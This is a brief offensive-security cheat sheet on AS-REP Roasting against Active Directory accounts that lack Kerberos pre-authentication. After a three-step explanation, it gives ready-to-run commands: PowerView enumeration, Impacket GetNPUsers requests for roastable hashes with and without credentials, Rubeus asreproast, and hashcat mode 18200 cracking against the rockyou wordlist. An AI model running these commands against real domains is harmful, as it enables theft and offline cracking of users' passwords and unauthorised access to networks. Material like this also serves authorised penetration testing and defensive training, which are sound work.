AS-REP Roasting

Introduction

AS-REP Roasting targets Active Directory accounts without Kerberos Pre-authentication.

The attack is made in few steps:

1. Attacker sends AS-REQ request in order to get TGT from the Authentication Server for target user without using pre-authentication.

2. Authentication Server sends encrypted TGT to the attacker.

3. Attacker brute-forces the TGT offline to obtain the user's password.

Enumerate

Enumerating accounts with Kerberos pre-authentication disabled from inside the network.

PowerView

Get-DomainUser -PreauthNotRequired -Verbose

Performing the attack

Impacket

unauthenticated:

impacket-GetNPUsers <domain_name>/ -no-pass -dc-ip <dc_ip> -usersfile <userslist_file> -outputfile <hashes_file>

Authenticated

impacket-GetNPUsers -dc-ip <dc_ip> -request -outputfile <hashes_file> <domain>/<username>

Rubeus

.\Rubeus.exe asreproast /nowrap

Crack

hashcat -m 18200 <hashes> /usr/share/wordlists/rockyou.txt